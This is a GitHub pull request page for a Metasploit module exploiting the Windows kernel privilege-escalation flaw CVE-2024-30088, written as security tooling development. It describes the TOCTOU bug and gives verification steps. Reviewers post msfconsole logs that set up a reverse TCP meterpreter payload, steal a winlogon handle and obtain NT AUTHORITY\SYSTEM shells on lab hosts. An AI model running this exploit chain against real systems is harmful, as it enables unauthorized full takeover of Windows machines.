Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Windows LPE CVE-2024-30088 #19345

Merged
merged 11 commits into from
Sep 17, 2024

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Jul 26, 2024

CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
Windows 11 and Windows Server 2022.

The vulnerability exists inside the function called AuthzBasepCopyoutInternalSecurityAttributes specifically when
the kernel copies the _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION of the current token object to user mode. When the
kernel preforms the copy of the SecurityAttributesList, it sets the list of the SecurityAttribute's structure
directly to the user supplied pointed. It then calls RtlCopyUnicodeString and
AuthzBasepCopyoutInternalSecurityAttributeValues to copy out the names and values of the SecurityAttribute leading
to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.

Setup

Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box.
This exploit module has been tested on Windows 10 version 22H2 build 19045.2965.

Verification Steps

  1. Start msfconsole
  2. Get a user level session on an affected Windows machine
  3. Do: use windows/local/cve_2024_30038_authz_basep
  4. Set the LHOST, LPORT, and SESSION options
  5. Run the module
  6. Receive a session running in the context of the NT AUTHORITY\SYSTEM user.

@jheysel-r7 jheysel-r7 force-pushed the win-kernel-lpe-cve-2024-30038 branch from 14b5ad0 to 4811577 Compare August 22, 2024 01:23
@jheysel-r7 jheysel-r7 marked this pull request as ready for review August 22, 2024 01:52
@jheysel-r7 jheysel-r7 force-pushed the win-kernel-lpe-cve-2024-30038 branch from bed314c to 31348da Compare August 22, 2024 06:23
@jheysel-r7 jheysel-r7 changed the title WIP CVE-2024-30088 Windows LPE CVE-2024-30088 Aug 22, 2024
@jheysel-r7 jheysel-r7 added a2k19 Hackathon 2019 in Austin module docs and removed a2k19 Hackathon 2019 in Austin labels Aug 22, 2024
@bwatters-r7 bwatters-r7 self-assigned this Aug 28, 2024
@bwatters-r7
Copy link
Contributor

The file external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c still exists, but it is empty?

Copy link
Contributor Author

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the detailed review @bwatters! I've applied your suggestions recompiled the dll and retested the module.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 172.16.199.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8680...
[*] Attempting to steal the handle from the winlogon process...
[+] Successfully stole winlogon handle: 1936
[+] Successfully retrieved winlogon pid: 720
[*] Sending stage (201798 bytes) to 172.16.199.139
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.139:53613) at 2024-08-29 19:13:23 -0400

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) >
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-FGNRA7E
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

@bwatters-r7
Copy link
Contributor

I have not been able to get this to work. I'm running this on Windows 10.0.19045.2006
image

@dledda-r7 dledda-r7 self-assigned this Sep 11, 2024
@jheysel-r7
Copy link
Contributor Author

Just posting for context. The first time I tested on 10.0.19045.2006 the exploit did fail. I reestablished a second user level session and the exploit succeeded on the second attempt - after this I updated the Reliability comment 05c3c9a as in my experience the exploit had usually worked on the first attempt. Apologies for the flaky-ness.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8112...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 1896
[+] Successfully retrieved winlogon pid: 9140
[*] Sending stage (201798 bytes) to 192.168.123.238
[*] Meterpreter session 13 opened (192.168.123.1:5555 -> 192.168.123.238:49676) at 2024-09-04 13:31:26 -0700

meterpreter > shell
Process 8848 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2006]

C:\Windows\system32>

Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks good to me.

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options

Module options (exploit/windows/local/cve_2024_30088_authz_basep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.26.90.20     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit

[*] Started reverse TCP handler on 172.26.90.20:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 2676...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 2740
[+] Successfully retrieved winlogon pid: 3680
[*] Sending stage (201798 bytes) to 172.26.91.192
[*] Meterpreter session 2 opened (172.26.90.20:4445 -> 172.26.91.192:50278) at 2024-09-16 09:32:53 -0400

meterpreter > sysinfo
Computer        : DESKTOP-9VQV3U4
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 8728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2251]

C:\Windows\system32>
msf6 payload(windows/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > bg 
[*] Backgrounding session 4...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > search authz_basep

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/local/cve_2024_30088_authz_basep  2024-06-11       excellent  Yes    Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/cve_2024_30088_authz_basep

msf6 payload(windows/x64/meterpreter_reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options

Module options (exploit/windows/local/cve_2024_30088_authz_basep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       172.31.7.159     yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lhost 192.168.3.3
lhost => 192.168.3.3
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit

[*] Started reverse TCP handler on 192.168.3.3:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 3960...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 8008
[+] Successfully retrieved winlogon pid: 568
[*] Meterpreter session 5 opened (192.168.3.3:4445 -> 10.5.134.118:50287) at 2024-09-17 07:41:41 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
vProcess 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2006]

C:\Windows\system32>

@dledda-r7 dledda-r7 merged commit 0bf5244 into rapid7:master Sep 17, 2024
63 checks passed
@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 17, 2024
@dledda-r7
Copy link
Contributor

dledda-r7 commented Sep 17, 2024

Release Notes

This adds a Windows LPE post module that exploits CVE-2024-30088. Once the exploit is executed through a running meterpreter session, it will open another one with NT AUTHORITY/SYSTEM privileges.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

4 participants